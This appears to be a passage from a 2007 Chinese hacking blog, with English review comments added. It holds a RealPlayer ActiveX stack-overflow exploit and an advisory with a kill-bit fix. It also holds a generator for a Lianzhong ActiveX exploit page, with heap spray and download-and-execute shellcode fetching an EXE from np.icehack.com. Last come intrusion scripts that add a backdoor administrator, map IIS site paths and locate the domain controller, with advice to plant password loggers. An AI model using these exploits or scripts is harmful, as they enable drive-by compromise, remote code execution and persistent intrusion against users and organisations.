for(i=0;i<32*148;i++)
  Padding += "S";

// Return address selection: every version outside the 6.0.14.x line uses a
// per-locale address; the 6.0.14.x builds each get their own.
if(RealVersion.indexOf("6.0.14.") == -1)
{
  if(navigator.userLanguage.toLowerCase() == "zh-cn")
   // NOTE(review): only three bytes here while every other address is four
   // -- possibly truncated in this copy of the listing; confirm against the
   // original sample before relying on it.
   ret = unescape("%7f%a5%60");
  else if(navigator.userLanguage.toLowerCase() == "en-us")
   ret = unescape("%4f%71%a4%60");
  else
   return;
}
else if(RealVersion == "6.0.14.544")
  ret = unescape("%63%11%08%60");
else if(RealVersion == "6.0.14.550")
  ret = unescape("%63%11%04%60");
else if(RealVersion == "6.0.14.552")
  ret = unescape("%79%31%01%60");
else if(RealVersion == "6.0.14.543")
  ret = unescape("%79%31%09%60");
else if(RealVersion == "6.0.14.536")
  ret = unescape("%51%11%70%63");
else
  return;

// Number of jump stubs before the return address depends on the major
// build line (4, 6, 9 or 10).
if(RealVersion.indexOf("6.0.10.") != -1)
{
  for(i=0;i<4;i++)
   Padding = Padding + JmpOver;
  Padding = Padding + ret;
}
else if(RealVersion.indexOf("6.0.11.") != -1)
{
  for(i=0;i<6;i++)
   Padding = Padding + JmpOver;
  Padding = Padding + ret;
}
else if(RealVersion.indexOf("6.0.12.") != -1)
{
  for(i=0;i<9;i++)
   Padding = Padding + JmpOver;
  Padding = Padding + ret;
}
else if(RealVersion.indexOf("6.0.14.") != -1)
{
  for(i=0;i<10;i++)
   Padding = Padding + JmpOver;
   // NOTE: despite the indentation this line is NOT inside the loop (no
   // braces); it runs once after it, like the three branches above.
   Padding = Padding + ret;
}

// Alphanumeric x86 stub ("L" = dec esp, "\\" = pop esp, "X" = pop eax,
// "D" = inc esp) that appears to re-point the stack before the shellcode.
AdjESP = "LLLL\\XXXXXLD";
// Shellcode was redacted from this copy of the page.
Shell = "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";
PayLoad = Padding + AdjESP + Shell;
// Grow the payload to at least 0x8000 characters.
while(PayLoad.length < 0x8000)
  PayLoad += "YuanGe"; // (author's aside: "sweat~ Brother Yuan~", a nod to YuanGe)
// Trigger: the oversized playlist name is the second argument.
Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
}
RealExploit();")
</script>

关于该漏洞的说明(来自绿盟):

Quotation
RealPlayer ierpplug.dll ActiveX控件播放列表名称栈溢出漏洞
RealPlayer是一款流行的媒体播放器,支持多种媒体格式。

RealPlayer的MPAMedia.dll库所提供的RealPlayer数据库组件在处理播放列表名时存在栈溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。

由于可使用ierpplug.dll所提供的IERPCtl ActiveX控件将本地文件导入到RealPlayer中指定的播放列表,因此如果用户受骗访问了恶意网页并通过IERPCtl ActiveX控件的Import()方式导入了恶意文件的话,就可以触发这个溢出,导致拒绝服务或执行任意指令。

< *来源:Will Dormann

链接:http://www.symantec.com/enterprise/security_response/weblog/2007/10/realplayer_exploit_on_the_loos.h
http://www.kb.cert.org/vuls/id/871673
http://service.real.com/realplayer/security/191007_player/en/
http://secunia.com/advisories/27248/
http://www.us-cert.gov/cas/techalerts/TA07-297A.html
*>

建议:
--------------------------------------------------------------------------------
临时解决方法:

在IE中禁用IERPCtl ActiveX控件,为以下CLSID设置kill bit:

{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}

或将以下文本保存为.REG文件并导入:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}]
"Compatibility Flags"=dword:00000400


联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞(exp)

2007年11月24日 Chinadu 没有评论

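' Generator for an HTML page that overflows the ConnectAndEnterRoom method of
' the Lianzhong (联众) ActiveX control (CLSID AE93C5DF-A990-11D1-AEBD-5254ABDD2B69)
' and runs a download-and-execute payload. It prompts for the URL of the EXE,
' appends it to the shellcode, heap-sprays, and writes netpatch.htm.
'
' NOTE(review): in the original listing "files.Close" was fused onto the end of
' the "</html>" writeline (a line-wrap artifact); it is its own statement here.
' The two helpers were also declared inside the If block; they are moved to
' script scope, where VBScript procedures are normally declared.
exeurl = InputBox( "请输入下载执行exe的地址:", "输入","http://np.icehack.com/np.exe" )
'code by NetPatch
if exeurl <> "" then
' Shellcode as "\xHH" text. It carries the names GetProcAddress,
' GetSystemDirectoryA, WinExec, ExitThread, LoadLibraryA, urlmon and
' URLDownloadToFileA plus the strings "cmd /c" and "\a.exe", so it appears to
' download the URL to a.exe in the system directory and run it (the URL,
' NUL-terminated, is appended by Unicode() below).
code="\xe9\xf3\x00\x00\x00\x90\x90\x90\x90\x5a\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x8b\xd8\x8b\x73\x3c\x8b\x74\x1e\x78\x03\xf3\x8b\x7e\x20\x03\xfb\x8b\x4e\x14\x33\xed\x56\x57\x51\x8b\x3f\x03\xfb\x8b\xf2\x6a\x0e\x59\xf3\xa6\x74\x08\x59\x5f\x83\xc7\x04\x45\xe2\xe9\x59\x5f\x5e\x8b\xcd\x8b\x46\x24\x03\xc3\xd1\xe1\x03\xc1\x33\xc9\x66\x8b\x08\x8b\x46\x1c\x03\xc3\xc1\xe1\x02\x03\xc1\x8b\x00\x03\xc3\x8b\xfa\x8b\xf7\x83\xc6\x0e\x8b\xd0\x6a\x04\x59\xe8\x6a\x00\x00\x00\x83\xc6\x0d\x52\x56\xff\x57\xfc\x5a\x8b\xd8\x6a\x01\x59\xe8\x57\x00\x00\x00\x83\xc6\x13\x56\x46\x80\x3e\x80\x75\xfa\x80\x36\x80\x5e\x83\xec\x40\x8b\xdc\xc7\x03\x63\x6d\x64\x20\x43\x43\x43\x43\x66\xc7\x03\x2f\x63\x43\x43\xc6\x03\x20\x43\x6a\x20\x53\xff\x57\xec\xc7\x04\x03\x5c\x61\x2e\x65\xc7\x44\x03\x04\x78\x65\x00\x00\x33\xc0\x50\x50\x53\x56\x50\xff\x57\xfc\x8b\xdc\x6a\x00\x53\xff\x57\xf0\x68\x51\x24\x40\x00\x58\xff\xd0\x33\xc0\xac\x85\xc0\x75\xf9\x51\x52\x56\x53\xff\xd2\x5a\x59\xab\xe2\xee\x33\xc0\xc3\xe8\x0c\xff\xff\xff\x47\x65\x74\x50\x72\x6f\x63\x41\x64\x64\x72\x65\x73\x73\x00\x47\x65\x74\x53\x79\x73\x74\x65\x6d\x44\x69\x72\x65\x63\x74\x6f\x72\x79\x41\x00\x57\x69\x6e\x45\x78\x65\x63\x00\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\x00\x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x41\x00\x75\x72\x6c\x6d\x6f\x6e\x00\x55\x52\x4c\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x54\x6f\x46\x69\x6c\x65\x41\x00"&Unicode(exeurl&Chr(00)&Chr(00))
set fso=CreateObject("scripting.filesystemobject")
' Mode 8 = ForAppending, create if missing: an existing netpatch.htm is
' appended to, not replaced.
set fileS=fso.opentextfile("netpatch.htm",8,true)
fileS.writeline "<html>"
fileS.writeline "<object classid=""clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69"" id='target'></object>"
fileS.writeline "<body>"
fileS.writeline "<SCRIPT language=""JavaScript"">"
' Shellcode as %uXXYY escapes (byte pairs swapped to little-endian words).
fileS.writeline "var shellcode = unescape("""&replaceregex(code)&""");"
' Heap spray: 300 blocks of NOP sled (0x9090) + shellcode, ~0x40000 chars each.
fileS.writeline "var bigblock = unescape(""%u9090%u9090"");"
fileS.writeline "var headersize = 20;"
fileS.writeline "var slackspace = headersize+shellcode.length;"
fileS.writeline "while (bigblock.length<slackspace) bigblock+=bigblock;"
fileS.writeline "fillblock = bigblock.substring(0, slackspace);"
fileS.writeline "block = bigblock.substring(0, bigblock.length-slackspace);"
fileS.writeline "while(block.length+slackspace<0x40000) block = block+block+fillblock;"
fileS.writeline "memory = new Array();"
fileS.writeline "for (x=0; x<300; x++) memory[x] = block +shellcode;"
' Trigger: 164 x "A", then 0x0a0a0a0a (presumably landing in the sprayed
' region), then 164 x "A" again, passed as the first argument.
fileS.writeline "var buffer = '';"
fileS.writeline "while (buffer.length < 164) buffer+=""A"";"
fileS.writeline "buffer=buffer+""\x0a\x0a\x0a\x0a""+buffer;"
fileS.writeline "ok=""ok"";"
fileS.writeline "target.ConnectAndEnterRoom(buffer,ok,ok,ok,ok,ok );"
fileS.writeline "</script>"
fileS.writeline "</body>"
fileS.writeline "</html>"
fileS.Close
Set fso=nothing
msgbox "生成完毕!"
end if

' Despite the name, emits ONE byte per character as "\xHH": Hex(AscW()) is
' always at most 4 digits, so the "< 5" test always holds and right(...,2)
' keeps only the low byte. Fine for an ASCII URL; anything non-ASCII is
' silently truncated.
Function Unicode(str1)
Dim str,temp
str = ""
For i=1 to len(str1)
temp = Hex(AscW(Mid(str1,i,1)))
If len(temp) < 5 Then temp = right("0000"&temp, 2)
str = str & "\x" & temp
Next
Unicode = str
End Function

' Rewrites each "\xAA\xBB" byte pair as "%uBBAA" (little-endian %u escape).
' Only pairs are matched, so an odd trailing "\xHH" is left as-is.
function replaceregex(str)
set regex=new regExp
regex.pattern="\\x(..)\\x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function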


我在入侵渗透中用过的三则VBS代码

2007年11月16日 Chinadu 没有评论

作者:lcx

zzzevazzz在他的名篇<<深入挖掘Windows脚本技术>>的结语中说到:“Windows脚本就像万能胶,能够把独立的程序、服务、控件组合起来完成任务。脚本编程的技巧就是组合的技巧。XP和2003比2000自带更多的命令行工具,WMI也大大加强了,脚本的功能水涨船高,可以说是‘只有想不到,没有做不到’,一切有待你的发掘。”这话很有道理,如果只把VBS看作是一个编程工具,用作写一些方便自己的小工具,对我们学入侵的人来讲则有点浪费其才能了。vbs简单易用,在入侵中用到好的话,会有意想不到的效果,这期就把我日常自己写自己用的三则vbs代码以飨读者。

一、用VBS来加管理员帐号

经常看到有人在论坛上讨论,在注入过程中明明有了sa帐号,但是由于net.exe和net1.exe被限制,或其它的不明原因,总是加不了管理员帐号。VBS在活动目录(adsi)部份有一个winnt对像,可以用来管理本地资源,可以用它不依靠cmd等命令来加一个管理员,详细代码如下:


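' Create a local user and put it in the local Administrators group through
' the ADSI WinNT provider, i.e. without net.exe / net1.exe.
' Edit sUser / sPass before running (the original hard-coded lcx / 123456).
' NOTE(review): the original also had "Set of=GetObject(os&"/lcx",user)",
' whose result was never used and whose second argument "user" was an
' undeclared name rather than the string "user"; that line is dropped.
' NOTE(review): the group is looked up by the English name "Administrators";
' confirm this on a non-English Windows install, where it may be localised.
sUser = "lcx"
sPass = "123456"
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName           ' ADSI path of this computer
Set ob=GetObject(os)                           ' bind to the computer object
Set oe=GetObject(os&"/Administrators,group")   ' bind to the local Administrators group
Set od=ob.Create("user",sUser)                 ' new user object, not yet committed
od.SetPassword sPass
od.SetInfo                                     ' commit the user
oe.add os&"/"&sUser                            ' add the new user to Administrators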

这段代码如果保存为1.vbs,在cmd下运行,格式: ●cscript 1.vbs●的话,会在当前系统加一个名字为lcx,密码为123456的管理员。当然,你可以用记事本来修改里边的变量lcx和123456,改成你喜欢的名字和密码值。

二、用vbs来列虚拟主机的物理目录

有时旁注入侵成功一个站,拿到系统权限后,面对上百个虚拟主机,怎样才能更快的找到我们目标站的物理目录呢?一个站一个站翻看太累,用系统自带的adsutil.vbs吧又感觉好像参数很多,有点无法下手的感觉,试试我这个脚本吧,代码如下:


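' Enumerate the IIS sites on this host via the IIS ADSI provider and print,
' one per line: site ID (padded to 25 columns), description (ServerComment)
' and the physical path of the site's root virtual directory.
' NOTE(review): the original assigned an unused sServerName; dropped.
Set ObjService=GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In ObjService
' Site nodes have numeric names; the other W3SVC children are skipped.
If IsNumeric(obj3w.Name) Then
Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root")
' Clamp the pad width at zero: String() raises an error on a negative count,
' which the original would hit for any site ID longer than 25 characters.
padLen = 25 - Len(obj3w.Name)
If padLen < 0 Then padLen = 0
ListAllWeb = ListAllWeb & obj3w.Name & String(padLen, " ") & obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf
End If
Next
WScript.Echo ListAllWeb
Set ObjService=Nothing
WScript.Quit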

运行●cscript 2.vbs●后,就会详细列出IIS里的站点ID、描述、及物理目录,是不是代码少很多又方便呢?

三、快速找到内网域的主服务器

面对域结构的内网,可能许多小菜没有经验如何去渗透。如果你能拿到主域管理员的密码,整个内网你就可以自由穿行了。主域管理员一般呆在比较重要的机器上,如果能搞定其中的一台或几台,放个密码记录器之类,相信总有一天你会拿到密码。主域服务器当然是其中最重要一台了,如何在成千台机器里判断出是哪一台呢?dos命令像●net group "domain admins" /domain●可以做为一个判断的标准,不过vbs也可以做到的,这仍然属于adsi部份的内容,代码如下:


' Bind to rootDSE and print its serverName attribute, which identifies the
' domain controller that answered the bind. Needs domain-user credentials.
WScript.Echo GetObject("LDAP://rootDSE").servername

只用这两句代码就足够了,运行●cscript 3.vbs●,会有结果的。当然,无论是dos命令或vbs,你前提必须要在域用户的权限下。好比你得到了一个域用户的帐号密码,你可以用 psexec.exe -u -p cmd.exe这样的格式来得到域用户的shell,或你的木马本来就是与桌面交互的,登陆你木马shell的又是域用户,就可以直接运行这些命令了。

vbs的在入侵中的作用当然不只这些,当然用js或其它工具也可以实现我上述代码的功能;不过这个专栏定下的题目是vbs在hacking中的妙用,所以我们只提vbs。写完vbs这部份我和其它作者会在以后的专栏继续策划其它的题目,争取为读者带来好的有用的文章。
